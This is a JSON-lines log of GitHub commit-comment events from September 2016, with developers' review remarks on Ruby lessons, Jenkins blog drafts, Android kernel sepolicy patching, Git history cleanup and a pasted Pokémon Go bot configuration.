{"id":"4505867595","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"balashovmb/mb_ror_basic"},"payload":{"comment":{"id":18872750,"position":63,"line":85,"path":"Lesson_7/classes/interface/interface.rb","commit_id":"eba740ea774e7f31b14578a4e8debf614fa82d9f","created_at":"2016-09-02T00:11:38Z","updated_at":"2016-09-02T00:11:38Z","body":"Это хорошо."}},"created_at":"2016-09-02T00:11:38Z"}
{"id":"4505869351","type":"CommitCommentEvent","actor":{"login":"bestony"},"repo":{"name":"NearTan/TranslateProject"},"payload":{"comment":{"id":18872754,"position":null,"line":null,"path":null,"commit_id":"4a4bfacc59c959ef5cad476aef2bf4af39eca0c1","created_at":"2016-09-02T00:12:12Z","updated_at":"2016-09-02T00:12:12Z","body":"暑假实习回来，对Devops有更深的理解。。。有空打算重新翻译一遍"}},"created_at":"2016-09-02T00:12:12Z"}
{"id":"4505872456","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"balashovmb/mb_ror_basic"},"payload":{"comment":{"id":18872763,"position":45,"line":65,"path":"Lesson_7/classes/interface/interface.rb","commit_id":"eba740ea774e7f31b14578a4e8debf614fa82d9f","created_at":"2016-09-02T00:13:14Z","updated_at":"2016-09-02T00:13:14Z","body":"Последнее значение, `return` можно не писать."}},"created_at":"2016-09-02T00:13:14Z"}
{"id":"4505873103","type":"CommitCommentEvent","actor":{"login":"diegorodriguesvieira"},"repo":{"name":"TwistedScorpio/OTHire"},"payload":{"comment":{"id":18872767,"position":null,"line":null,"path":null,"commit_id":"8e567570eec5a2d4570a376bb7431ee280d36513","created_at":"2016-09-02T00:13:27Z","updated_at":"2016-09-02T00:13:27Z","body":"@peonso ID: 1386 a ladder"}},"created_at":"2016-09-02T00:13:27Z"}
{"id":"4505874047","type":"CommitCommentEvent","actor":{"login":"benjaminfuchs"},"repo":{"name":"benjaminfuchs/warnings-plugin"},"payload":{"comment":{"id":18872773,"position":null,"line":null,"path":null,"commit_id":"4b0d422b7709f14745a5bfad90bc43eb686e69fe","created_at":"2016-09-02T00:13:47Z","updated_at":"2016-09-02T00:13:47Z","body":"@benjaminfuchs Note to myself: Clean up the imports and maybe cleanup tab/whitspace stuff that went wrong !?! \r\nAnd have look at this https://github.com/jenkinsci/pipeline-plugin/blob/master/DEVGUIDE.md"}},"created_at":"2016-09-02T00:13:47Z"}
{"id":"4505874343","type":"CommitCommentEvent","actor":{"login":"i386"},"repo":{"name":"abayer/jenkins.io"},"payload":{"comment":{"id":18872774,"position":33,"line":33,"path":"content/blog/2016/2016-09-02-jenkins-world-speaker-blog-pipeline-model-definition.adoc","commit_id":"c8520cf045ba8bc49787c6bcc3cf61d836afaaa2","created_at":"2016-09-02T00:13:53Z","updated_at":"2016-09-02T00:13:53Z","body":"Swap this paragraph with the one above.\r\n\r\nPerhaps something\r\n> With new changes to Jenkins Pipeline you are now able to define your pipeline like configuration in `Jenkinsfile` by installing the new [Pipeline Model Definition](https://wiki.jenkins-ci.org/display/JENKINS/Pipeline+Model+Definition+Plugin) plugin. It's available today for you to try via the update center.\r\n"}},"created_at":"2016-09-02T00:13:53Z"}
{"id":"4505874917","type":"CommitCommentEvent","actor":{"login":"jcadduono"},"repo":{"name":"jcadduono/idleKernel-note3"},"payload":{"comment":{"id":18872776,"position":null,"line":null,"path":null,"commit_id":"376481267592ae9668f4402c75a729fc5503c09f","created_at":"2016-09-02T00:14:04Z","updated_at":"2016-09-02T00:14:04Z","body":"basically, i boot into twrp and extract supersu zip, copy supolicy and libsupol.so to /sbin/ and then:\r\n```sh\r\nsed -i \"s|/system/bin/linker\\x0|/sbin/linker\\x0\\x0\\x0\\x0\\x0\\x0\\x0|g\" /sbin/libsupol.so\r\nsed -i \"s|/system/bin/linker\\x0|/sbin/linker\\x0\\x0\\x0\\x0\\x0\\x0\\x0|g\" /sbin/supolicy\r\n```\r\nthen i copy all the stock sepolicy files to /tmp/sepolicy\r\nthen `find -type f -name sepolicy -exec supolicy \"{}\" \"{}_\"`\r\nthen supolicy will patch them all, sepolicy_ named ones are patched\r\n\r\nnowadays i just include dynamic patching scripts, ex. my kernels are built based on current kernel, ex.\r\nhttps://github.com/jcadduono/lazyflasher/blob/system-supersu/patch.d/03-supersu"}},"created_at":"2016-09-02T00:14:04Z"}
{"id":"4505876645","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"balashovmb/mb_ror_basic"},"payload":{"comment":{"id":18872782,"position":54,"line":80,"path":"Lesson_7/classes/interface/interface.rb","commit_id":"eba740ea774e7f31b14578a4e8debf614fa82d9f","created_at":"2016-09-02T00:14:38Z","updated_at":"2016-09-02T00:14:38Z","body":"Здесь не совсем понятно почему метод, который что-то выводит вдруг возвращает какой-то объект. Поэтому лучше сначала выбирать поезд: `train = select_train`, а потом уже выводить список вагонов: `show_train_carriages(train)`."}},"created_at":"2016-09-02T00:14:38Z"}
{"id":"4505877637","type":"CommitCommentEvent","actor":{"login":"Salgadoema"},"repo":{"name":"Salgadoema/Normans_sky"},"payload":{"comment":{"id":18872786,"position":null,"line":null,"path":null,"commit_id":"3669b1118a1d66f4ab48d89632e9458748a22883","created_at":"2016-09-02T00:14:59Z","updated_at":"2016-09-02T00:14:59Z","body":"1234"}},"created_at":"2016-09-02T00:14:59Z"}
{"id":"4505880878","type":"CommitCommentEvent","actor":{"login":"i386"},"repo":{"name":"abayer/jenkins.io"},"payload":{"comment":{"id":18872793,"position":64,"line":64,"path":"content/blog/2016/2016-09-02-jenkins-world-speaker-blog-pipeline-model-definition.adoc","commit_id":"c8520cf045ba8bc49787c6bcc3cf61d836afaaa2","created_at":"2016-09-02T00:16:02Z","updated_at":"2016-09-02T00:16:02Z","body":"> It's still early days however there is a lot of functionality planned that will make it easier for you to create pipelines"}},"created_at":"2016-09-02T00:16:02Z"}
{"id":"4505881662","type":"CommitCommentEvent","actor":{"login":"Matt07211"},"repo":{"name":"Matt07211/xcover3ltexx_custom_kernel"},"payload":{"comment":{"id":18872796,"position":null,"line":null,"path":null,"commit_id":"e2b33efe919b223acc3200f7cbbdd639da6e7301","created_at":"2016-09-02T00:16:17Z","updated_at":"2016-09-02T00:16:17Z","body":"Since this is a learning experience for me, probably for you to, we will leave it as is, till we are able to make multiple kernels and boot reliably on this phone. Check you PM on XDA as well"}},"created_at":"2016-09-02T00:16:17Z"}
{"id":"4505884540","type":"CommitCommentEvent","actor":{"login":"nolanlawson"},"repo":{"name":"babel/babel.github.io"},"payload":{"comment":{"id":18872804,"position":null,"line":null,"path":null,"commit_id":"00df854d5afec97516bf6172aa740d6173d8122b","created_at":"2016-09-02T00:17:15Z","updated_at":"2016-09-02T00:17:15Z","body":":+1:"}},"created_at":"2016-09-02T00:17:15Z"}
{"id":"4505885878","type":"CommitCommentEvent","actor":{"login":"peonso"},"repo":{"name":"TwistedScorpio/OTHire"},"payload":{"comment":{"id":18872810,"position":null,"line":null,"path":null,"commit_id":"8e567570eec5a2d4570a376bb7431ee280d36513","created_at":"2016-09-02T00:17:40Z","updated_at":"2016-09-02T00:17:40Z","body":"Gonna try to track this, I don't think it's related at all with this commit. I committed your changes, compiled here fine, seems to be working as intended."}},"created_at":"2016-09-02T00:17:40Z"}
{"id":"4505886466","type":"CommitCommentEvent","actor":{"login":"i386"},"repo":{"name":"abayer/jenkins.io"},"payload":{"comment":{"id":18872811,"position":72,"line":72,"path":"content/blog/2016/2016-09-02-jenkins-world-speaker-blog-pipeline-model-definition.adoc","commit_id":"c8520cf045ba8bc49787c6bcc3cf61d836afaaa2","created_at":"2016-09-02T00:17:51Z","updated_at":"2016-09-02T00:17:51Z","body":"Nix this paragraph"}},"created_at":"2016-09-02T00:17:51Z"}
{"id":"4505886679","type":"CommitCommentEvent","actor":{"login":"mstembera"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18872812,"position":null,"line":null,"path":null,"commit_id":"0e7fb0b288ec221be90c52cdc5c59beda325d2a6","created_at":"2016-09-02T00:17:54Z","updated_at":"2016-09-02T00:17:54Z","body":"Please ignore my comment above.  I confused myself.  What I really meant was\r\nhttp://tests.stockfishchess.org/tests/view/57c8c4a80ebc59030fbe4cfb "}},"created_at":"2016-09-02T00:17:54Z"}
{"id":"4505887251","type":"CommitCommentEvent","actor":{"login":"i386"},"repo":{"name":"abayer/jenkins.io"},"payload":{"comment":{"id":18872814,"position":77,"line":77,"path":"content/blog/2016/2016-09-02-jenkins-world-speaker-blog-pipeline-model-definition.adoc","commit_id":"c8520cf045ba8bc49787c6bcc3cf61d836afaaa2","created_at":"2016-09-02T00:18:05Z","updated_at":"2016-09-02T00:18:05Z","body":"> This is just a small taste of what I'll be covering..."}},"created_at":"2016-09-02T00:18:05Z"}
{"id":"4505889489","type":"CommitCommentEvent","actor":{"login":"i386"},"repo":{"name":"abayer/jenkins.io"},"payload":{"comment":{"id":18872819,"position":14,"line":14,"path":"content/blog/2016/2016-09-02-jenkins-world-speaker-blog-pipeline-model-definition.adoc","commit_id":"c8520cf045ba8bc49787c6bcc3cf61d836afaaa2","created_at":"2016-09-02T00:18:51Z","updated_at":"2016-09-02T00:18:51Z","body":"Great intro 💯 "}},"created_at":"2016-09-02T00:18:51Z"}
{"id":"4505889550","type":"CommitCommentEvent","actor":{"login":"oblitum"},"repo":{"name":"Caloni/ProblematicProject"},"payload":{"comment":{"id":18872820,"position":null,"line":null,"path":null,"commit_id":"f46877de9d71416c81c150b2727b74a0e0fd95bb","created_at":"2016-09-02T00:18:51Z","updated_at":"2016-09-02T00:18:51Z","body":"Apesar de os binários não estarem mais presentes na ponta do repositório, eles ainda estão no histórico. Se estes forem relevantemente grandes, vão atrapalhar para sempre o clone inicial com uma gordura extra no download e no disco. Se a inclusão do binário foi acidental e o tamanho for relevante a solução mesmo é `git rebase -i` + `git push -f`, para remover tal commit do histórico.\r\n\r\nTive que fazer isto em um repo que tive que mexer e percebi 300MB de download no clone... o commit raiz incluia vídeos de teste de análise de imagem que foram \"removidos\" no commit seguinte, mas não resolveu muita coisa. Dei o aviso e reescrevi o histórico todo fazendo o amend do commit raiz (`git rebase -i --root\r\n`)."}},"created_at":"2016-09-02T00:18:51Z"}
{"id":"4505890181","type":"CommitCommentEvent","actor":{"login":"i386"},"repo":{"name":"abayer/jenkins.io"},"payload":{"comment":{"id":18872821,"position":null,"line":null,"path":null,"commit_id":"c8520cf045ba8bc49787c6bcc3cf61d836afaaa2","created_at":"2016-09-02T00:19:02Z","updated_at":"2016-09-02T00:19:02Z","body":"Good stuff @abayer - I've finished with my comments"}},"created_at":"2016-09-02T00:19:02Z"}
{"id":"4505894833","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18872833,"position":null,"line":null,"path":null,"commit_id":"8bcaee4f51a7842e76aceb87e2c073fd7988152a","created_at":"2016-09-02T00:20:27Z","updated_at":"2016-09-02T00:20:27Z","body":"All of the fancy chars would make it to hard."}},"created_at":"2016-09-02T00:20:27Z"}
{"id":"4505894933","type":"CommitCommentEvent","actor":{"login":"perry-clarke"},"repo":{"name":"zhengxiawu/ideviceinstaller"},"payload":{"comment":{"id":18872834,"position":null,"line":null,"path":null,"commit_id":"3652f37cf72096080a70da3ba875367af26e4681","created_at":"2016-09-02T00:20:29Z","updated_at":"2016-09-02T00:20:29Z","body":"I can confirm this resolves the issue on OS X 10.11.6"}},"created_at":"2016-09-02T00:20:29Z"}
{"id":"4505898072","type":"CommitCommentEvent","actor":{"login":"newswim"},"repo":{"name":"newswim/level-up-react"},"payload":{"comment":{"id":18872843,"position":null,"line":null,"path":null,"commit_id":"1cb10f4f6d3a4147b3b5e80933166eac0d994f38","created_at":"2016-09-02T00:21:32Z","updated_at":"2016-09-02T00:21:32Z","body":"I'm not seeing the typo you're referring to"}},"created_at":"2016-09-02T00:21:32Z"}
{"id":"4505899504","type":"CommitCommentEvent","actor":{"login":"diegorodriguesvieira"},"repo":{"name":"TwistedScorpio/OTHire"},"payload":{"comment":{"id":18872845,"position":null,"line":null,"path":null,"commit_id":"8e567570eec5a2d4570a376bb7431ee280d36513","created_at":"2016-09-02T00:22:00Z","updated_at":"2016-09-02T00:22:00Z","body":"I'll test without the last commit and see if it works without bugs..."}},"created_at":"2016-09-02T00:22:00Z"}
{"id":"4505900067","type":"CommitCommentEvent","actor":{"login":"Brazuca87"},"repo":{"name":"NoxxDev/NecroBot"},"payload":{"comment":{"id":18872849,"position":null,"line":null,"path":null,"commit_id":"cace722f9930ba0e70d99adec653329f39f7dbc2","created_at":"2016-09-02T00:22:12Z","updated_at":"2016-09-02T00:22:12Z","body":"@NoxxDev it looks to me like the settings are fine.\r\n\r\n```\r\n{\r\n  \"ConsoleConfig\": {\r\n    \"TranslationLanguageCode\": \"en\",\r\n    \"StartupWelcomeDelay\": true,\r\n    \"AmountOfPokemonToDisplayOnStart\": 10,\r\n    \"DetailedCountsBeforeRecycling\": true\r\n  },\r\n  \"UpdateConfig\": {\r\n    \"CheckForUpdates\": true,\r\n    \"AutoUpdate\": true,\r\n    \"TransferConfigAndAuthOnUpdate\": true\r\n  },\r\n  \"WebsocketsConfig\": {\r\n    \"UseWebsocket\": true,\r\n    \"WebSocketPort\": 14251\r\n  },\r\n  \"LocationConfig\": {\r\n    \"DisableHumanWalking\": false,\r\n    \"StartFromLastPosition\": true,\r\n    \"DefaultLatitude\": 40.788827,\r\n    \"DefaultLongitude\": -73.959746,\r\n    \"WalkingSpeedInKilometerPerHour\": 12.16,\r\n    \"UseWalkingSpeedVariant\": true,\r\n    \"WalkingSpeedVariant\": 2.4,\r\n    \"ShowVariantWalking\": true,\r\n    \"RandomlyPauseAtStops\": true,\r\n    \"MaxSpawnLocationOffset\": 10,\r\n    \"MaxTravelDistanceInMeters\": 1500\r\n  },\r\n  \"TelegramConfig\": {\r\n    \"UseTelegramAPI\": false,\r\n    \"TelegramAPIKey\": null,\r\n    \"TelegramPassword\": \"12345\"\r\n  },\r\n  \"GPXConfig\": {\r\n    \"UseGpxPathing\": false,\r\n    \"GpxFile\": \"CentralPark2_Period.gpx\"\r\n  },\r\n  \"SnipeConfig\": {\r\n    \"UseSnipeLocationServer\": false,\r\n    \"SnipeLocationServer\": \"localhost\",\r\n    \"SnipeLocationServerPort\": 16970,\r\n    \"GetSniperInfoFromPokezz\": false,\r\n    \"GetOnlyVerifiedSniperInfoFromPokezz\": true,\r\n    \"GetSniperInfoFromPokeSnipers\": false,\r\n    \"GetSniperInfoFromPokeWatchers\": false,\r\n    \"GetSniperInfoFromSkiplagged\": false,\r\n    \"MinPokeballsToSnipe\": 20,\r\n    \"MinPokeballsWhileSnipe\": 0,\r\n    \"MinDelayBetweenSnipes\": 60000,\r\n    \"SnipingScanOffset\": 0.005,\r\n    \"SnipeAtPokestops\": false,\r\n    \"SnipeIgnoreUnknownIv\": false,\r\n    \"UseTransferIvForSnipe\": false,\r\n    \"SnipePokemonNotInPokedex\": true,\r\n    \"UseSnipeLimit\": true,\r\n    \"SnipeRestSeconds\": 600,\r\n    \"SnipeCountLimit\": 39\r\n  },\r\n  \"HumanWalkSnipeConfig\": {\r\n    \"DisplayPokemonList\": true,\r\n    \"MaxDistance\": 1500.0,\r\n    \"MaxEstimateTime\": 900.0,\r\n    \"CatchEmAllMinBalls\": 50,\r\n    \"TryCatchEmAll\": true,\r\n    \"CatchPokemonWhileWalking\": true,\r\n    \"SpinWhileWalking\": true,\r\n    \"AlwaysWalkback\": false,\r\n    \"SnipingScanOffset\": 0.025,\r\n    \"Enable\": true,\r\n    \"WalkbackDistanceLimit\": 300.0,\r\n    \"IncludeDefaultLocation\": true,\r\n    \"UsePokeRadar\": true,\r\n    \"UseSkiplagged\": true,\r\n    \"UseSnipePokemonList\": true,\r\n    \"MaxSpeedUpSpeed\": 20.5,\r\n    \"AllowSpeedUp\": true,\r\n    \"DelayTimeAtDestination\": 8000\r\n  },\r\n  \"PokeStopConfig\": {\r\n    \"UsePokeStopLimit\": false,\r\n    \"PokeStopLimit\": 1998,\r\n    \"PokeStopLimitMinutes\": 1470\r\n  },\r\n  \"PokemonConfig\": {\r\n    \"CatchPokemon\": true,\r\n    \"DelayBetweenPokemonCatch\": 3000,\r\n    \"UseCatchLimit\": false,\r\n    \"CatchPokemonLimit\": 998,\r\n    \"CatchPokemonLimitMinutes\": 1470,\r\n    \"UseIncenseConstantly\": false,\r\n    \"UseEggIncubators\": true,\r\n    \"UseLimitedEggIncubators\": false,\r\n    \"UseLuckyEggConstantly\": false,\r\n    \"UseLuckyEggsMinPokemonAmount\": 50,\r\n    \"UseLuckyEggsWhileEvolving\": true,\r\n    \"UseBerriesMinCp\": 1000,\r\n    \"UseBerriesMinIv\": 80.0,\r\n    \"UseBerriesBelowCatchProbability\": 0.25,\r\n    \"UseBerriesOperator\": \"or\",\r\n    \"MaxBerriesToUsePerPokemon\": 5,\r\n    \"TransferWeakPokemon\": false,\r\n    \"TransferDuplicatePokemon\": true,\r\n    \"TransferDuplicatePokemonOnCapture\": false,\r\n    \"RenamePokemon\": true,\r\n    \"RenameOnlyAboveIv\": true,\r\n    \"RenameTemplate\": \"{1} {0}\",\r\n    \"FavoriteMinIvPercentage\": 93.0,\r\n    \"AutoFavoritePokemon\": true,\r\n    \"MaxPokeballsPerPokemon\": 6,\r\n    \"UseGreatBallAboveCp\": 1000,\r\n    \"UseUltraBallAboveCp\": 1250,\r\n    \"UseMasterBallAboveCp\": 1500,\r\n    \"UseGreatBallAboveIv\": 85.0,\r\n    \"UseUltraBallAboveIv\": 95.0,\r\n    \"UseGreatBallBelowCatchProbability\": 0.2,\r\n    \"UseUltraBallBelowCatchProbability\": 0.1,\r\n    \"UseMasterBallBelowCatchProbability\": 0.05,\r\n    \"AutomaticallyLevelUpPokemon\": false,\r\n    \"OnlyUpgradeFavorites\": true,\r\n    \"UseLevelUpList\": true,\r\n    \"AmountOfTimesToUpgradeLoop\": 5,\r\n    \"GetMinStarDustForLevelUp\": 5000,\r\n    \"LevelUpByCPorIv\": \"iv\",\r\n    \"UpgradePokemonCpMinimum\": 1000.0,\r\n    \"UpgradePokemonIvMinimum\": 95.0,\r\n    \"UpgradePokemonMinimumStatsOperator\": \"and\",\r\n    \"EvolveAboveIvValue\": 95.0,\r\n    \"EvolveAllPokemonAboveIv\": false,\r\n    \"EvolveAllPokemonWithEnoughCandy\": true,\r\n    \"EvolveKeptPokemonsAtStorageUsagePercentage\": 90.0,\r\n    \"KeepPokemonsThatCanEvolve\": true,\r\n    \"KeepMinCp\": 1250,\r\n    \"KeepMinIvPercentage\": 90.0,\r\n    \"KeepMinLvl\": 20,\r\n    \"KeepMinOperator\": \"or\",\r\n    \"UseKeepMinLvl\": false,\r\n    \"PrioritizeIvOverCp\": false,\r\n    \"KeepMinDuplicatePokemon\": 1,\r\n    \"UsePokemonToNotCatchFilter\": false,\r\n    \"UsePokemonSniperFilterOnly\": false,\r\n    \"DumpPokemonStats\": true\r\n  },\r\n  \"RecycleConfig\": {\r\n    \"VerboseRecycling\": true,\r\n    \"RecycleInventoryAtUsagePercentage\": 98.0,\r\n    \"RandomizeRecycle\": false,\r\n    \"RandomRecycleValue\": 5,\r\n    \"TotalAmountOfPokeballsToKeep\": 280,\r\n    \"TotalAmountOfPotionsToKeep\": 0,\r\n    \"TotalAmountOfRevivesToKeep\": 0,\r\n    \"TotalAmountOfBerriesToKeep\": 50\r\n  },\r\n  \"CustomCatchConfig\": {\r\n    \"EnableHumanizedThrows\": true,\r\n    \"EnableMissedThrows\": true,\r\n    \"ThrowMissPercentage\": 15,\r\n    \"NiceThrowChance\": 40,\r\n    \"GreatThrowChance\": 60,\r\n    \"ExcellentThrowChance\": 10,\r\n    \"CurveThrowChance\": 95,\r\n    \"ForceGreatThrowOverIv\": 90.0,\r\n    \"ForceExcellentThrowOverIv\": 95.0,\r\n    \"ForceGreatThrowOverCp\": 1000,\r\n    \"ForceExcellentThrowOverCp\": 1500\r\n  },\r\n  \"PlayerConfig\": {\r\n    \"DelayBetweenPlayerActions\": 5000,\r\n    \"EvolveActionDelay\": 23000,\r\n    \"TransferActionDelay\": 5000,\r\n    \"RecycleActionDelay\": 2000,\r\n    \"RenamePokemonActionDelay\": 7000,\r\n    \"UseNearActionRandom\": false,\r\n    \"AutoCompleteTutorial\": false,\r\n    \"DesiredNickname\": null,\r\n    \"DesiredGender\": null,\r\n    \"DesiredStarter\": null\r\n  },\r\n  \"SoftBanConfig\": {\r\n    \"FastSoftBanBypass\": false\r\n  },\r\n  \"GoogleWalkConfig\": {\r\n    \"UseGoogleWalk\": true,\r\n    \"DefaultStepLength\": 1.3,\r\n    \"GoogleHeuristic\": \"walking\",\r\n    \"GoogleAPIKey\": \"\",\r\n    \"Cache\": true\r\n  },\r\n  \"YoursWalkConfig\": {\r\n    \"UseYoursWalk\": false,\r\n    \"YoursWalkHeuristic\": \"bicycle\"\r\n  },\r\n}\r\n```\r\nRemoved the filters portion to make it shorter...\r\nWhen starting an older build (not really sure to what commit that one is, but it's before those config) it's sitting idle for about 2 mins before it does anything... But then it works just fine... Really strange..."}},"created_at":"2016-09-02T00:22:12Z"}
{"id":"4505904296","type":"CommitCommentEvent","actor":{"login":"diegorodriguesvieira"},"repo":{"name":"TwistedScorpio/OTHire"},"payload":{"comment":{"id":18872854,"position":null,"line":null,"path":null,"commit_id":"8e567570eec5a2d4570a376bb7431ee280d36513","created_at":"2016-09-02T00:23:36Z","updated_at":"2016-09-02T00:23:36Z","body":"I tested out the last commit the bug happened again... :'("}},"created_at":"2016-09-02T00:23:36Z"}
{"id":"4505904360","type":"CommitCommentEvent","actor":{"login":"peonso"},"repo":{"name":"TwistedScorpio/OTHire"},"payload":{"comment":{"id":18872855,"position":null,"line":null,"path":null,"commit_id":"683177bac0f740031fddc073de4247485579b937","created_at":"2016-09-02T00:23:37Z","updated_at":"2016-09-02T00:23:37Z","body":"@diegorodriguesvieira worked dude!"}},"created_at":"2016-09-02T00:23:37Z"}
{"id":"4505904974","type":"CommitCommentEvent","actor":{"login":"phase"},"repo":{"name":"phase/Blargboard"},"payload":{"comment":{"id":18872858,"position":null,"line":null,"path":null,"commit_id":"8d380acf6c85017d3e6d31fe3884e26397f58f9f","created_at":"2016-09-02T00:23:50Z","updated_at":"2016-09-02T00:23:50Z","body":"I don't recall exactly what it was, but it looks like `$level` was doing weird stuff when it was negative. [This patch](https://github.com/phase/blargdiff/blob/master/differences.patch) contains all the changes from 1.1 to 1.2, and I don't see this change in there. This repository was built off of 1.1, as 1.2 didn't add anything important."}},"created_at":"2016-09-02T00:23:50Z"}
{"id":"4505906742","type":"CommitCommentEvent","actor":{"login":"chiyoung"},"repo":{"name":"hisundar/ep-engine"},"payload":{"comment":{"id":18872861,"position":12,"line":192,"path":"src/flusher.cc","commit_id":"b569c3c8d50a07187b2db147c29020267cc6dc06","created_at":"2016-09-02T00:24:25Z","updated_at":"2016-09-02T00:24:25Z","body":"I think the above logic should be adapted to\r\n\r\nif (currCommitInterval > 0 && currCommitInterval < initCommitInterval) {\r\n    // Commit before snoozing the flusher, if some vbuckets are already flushed, but not committed yet\r\n    store->commit(shard->getId());\r\n    resetCommitInterval();\r\n}\r\ntask-snooze(tosleep);\r\n"}},"created_at":"2016-09-02T00:24:25Z"}
{"id":"4505907577","type":"CommitCommentEvent","actor":{"login":"littledan"},"repo":{"name":"tc39/proposal-cancelable-promises"},"payload":{"comment":{"id":18872865,"position":null,"line":null,"path":null,"commit_id":"d3cf4970e6922b27314da1668d7b9a6d03ba9950","created_at":"2016-09-02T00:24:43Z","updated_at":"2016-09-02T00:24:43Z","body":"+1 Thanks for this explanation"}},"created_at":"2016-09-02T00:24:43Z"}
{"id":"4505911262","type":"CommitCommentEvent","actor":{"login":"Caloni"},"repo":{"name":"Caloni/ProblematicProject"},"payload":{"comment":{"id":18872875,"position":null,"line":null,"path":null,"commit_id":"f46877de9d71416c81c150b2727b74a0e0fd95bb","created_at":"2016-09-02T00:26:04Z","updated_at":"2016-09-02T00:26:04Z","body":"Valeu pelo comentário! Pensei em falar sobre isso, mas já tava quase meia-hora de vídeo. Pode ser um tema meio periférico quando for falar mais sobre manutenção dos repositórios. Um cliente nosso teve o mesmo problema, mas não tiveram a paciência de refazer os hashes.\r\n\r\nSe for um repo com muita história, que tem releases relacionados com os commits, é melhor arquivar para referência, mas montar um novo baseado no velho, mas \"limpinho\" ;)"}},"created_at":"2016-09-02T00:26:04Z"}
{"id":"4505914169","type":"CommitCommentEvent","actor":{"login":"ASvyatkovskiy"},"repo":{"name":"CMSBigDataProject/SparkBaconAnalyzer"},"payload":{"comment":{"id":18872883,"position":1,"line":1,"path":"test/src/main/resources/skimWorkflow.conf","commit_id":"1256f0e4a4fef09885ec77595b14f0e9ebc6ec4f","created_at":"2016-09-02T00:27:04Z","updated_at":"2016-09-02T00:27:04Z","body":"Better than hardcoding input output paths. "}},"created_at":"2016-09-02T00:27:04Z"}
{"id":"4505917844","type":"CommitCommentEvent","actor":{"login":"ASvyatkovskiy"},"repo":{"name":"CMSBigDataProject/SparkBaconAnalyzer"},"payload":{"comment":{"id":18872896,"position":65,"line":584,"path":"test/src/main/scala/SkimWorkflow.scala","commit_id":"b457f37e9682cb8f4581994935993d122815ab52","created_at":"2016-09-02T00:28:25Z","updated_at":"2016-09-02T00:28:25Z","body":"Some of the file paths might be incorrect, or corresponding folders are empty: we need to check carefully\r\nSome of the Avro files might be corrupt."}},"created_at":"2016-09-02T00:28:25Z"}
{"id":"4505918769","type":"CommitCommentEvent","actor":{"login":"dirk-thomas"},"repo":{"name":"ros/rosdistro"},"payload":{"comment":{"id":18872897,"position":19,"line":3427,"path":"kinetic/distribution.yaml","commit_id":"83cbdad2ef2c1e85ae60eb961100b9f150edd1c3","created_at":"2016-09-02T00:28:45Z","updated_at":"2016-09-02T00:28:45Z","body":"The kinetic track is using the indigo branch: https://github.com/turtlebot-release/turtlebot-release/blob/65c65915bf2421c2ac63b17adca2320f558f31a2/tracks.yaml#L57 That doesn't look correct."}},"created_at":"2016-09-02T00:28:45Z"}
{"id":"4505919313","type":"CommitCommentEvent","actor":{"login":"oblitum"},"repo":{"name":"Caloni/ProblematicProject"},"payload":{"comment":{"id":18872898,"position":null,"line":null,"path":null,"commit_id":"f46877de9d71416c81c150b2727b74a0e0fd95bb","created_at":"2016-09-02T00:28:57Z","updated_at":"2016-09-02T00:28:57Z","body":"De fato. No meu caso não havia tags no repositório."}},"created_at":"2016-09-02T00:28:57Z"}
{"id":"4505920592","type":"CommitCommentEvent","actor":{"login":"cesarouchida"},"repo":{"name":"cesarouchida/demo"},"payload":{"comment":{"id":18872899,"position":null,"line":null,"path":null,"commit_id":"342eb9cfab5229e3fdcaefb40d24a63004c56b55","created_at":"2016-09-02T00:29:25Z","updated_at":"2016-09-02T00:29:25Z","body":"Rollback do app.json\r\n"}},"created_at":"2016-09-02T00:29:25Z"}
{"id":"4505921149","type":"CommitCommentEvent","actor":{"login":"jmhobbs"},"repo":{"name":"jmhobbs/cultofthepartyparrot.com"},"payload":{"comment":{"id":18872903,"position":null,"line":null,"path":null,"commit_id":"9d70b8dd5d46d8434f2e1cdde4da4316688d2277","created_at":"2016-09-02T00:29:38Z","updated_at":"2016-09-02T00:29:38Z","body":"![](http://cultofthepartyparrot.com/parrots/parrot.gif)"}},"created_at":"2016-09-02T00:29:38Z"}
{"id":"4505922607","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":18872908,"position":36,"line":36,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/CipherOption.java","commit_id":"d87b3a6a6faa6838ca0191a1a04159e91e9f3696","created_at":"2016-09-02T00:30:09Z","updated_at":"2016-09-02T00:30:09Z","body":"hint: Iv -> InitialVector"}},"created_at":"2016-09-02T00:30:09Z"}
{"id":"4505922989","type":"CommitCommentEvent","actor":{"login":"ASvyatkovskiy"},"repo":{"name":"CMSBigDataProject/SparkBaconAnalyzer"},"payload":{"comment":{"id":18872910,"position":4,"line":557,"path":"test/src/main/scala/SkimWorkflow.scala","commit_id":"33f1154f7d933ded84d7c981065b78e60a435905","created_at":"2016-09-02T00:30:15Z","updated_at":"2016-09-02T00:30:15Z","body":"When running with spark-submit in the cluster mode, need to package the **Cert.json** using **--files**, which makes it available in the working directory in each of the executors."}},"created_at":"2016-09-02T00:30:15Z"}
{"id":"4505924770","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":18872914,"position":54,"line":54,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/CipherOption.java","commit_id":"d87b3a6a6faa6838ca0191a1a04159e91e9f3696","created_at":"2016-09-02T00:30:49Z","updated_at":"2016-09-02T00:30:49Z","body":"2 space indent"}},"created_at":"2016-09-02T00:30:49Z"}
{"id":"4505925087","type":"CommitCommentEvent","actor":{"login":"tadatuta"},"repo":{"name":"bem/bem-components"},"payload":{"comment":{"id":18872916,"position":46,"line":35,"path":"design/common.blocks/spin/_theme/spin_theme_islands.post.css","commit_id":"e3a60a8c4e5414ec1f5b48ff99e1718e2fe05149","created_at":"2016-09-02T00:30:55Z","updated_at":"2016-09-02T00:30:55Z","body":"I don't think we need extra plugin for just one tiny place.\r\n\r\nLet's keep it like this but add a note to comment. E.g. `/* bgShift = $borderWidth * -1 */`"}},"created_at":"2016-09-02T00:30:55Z"}
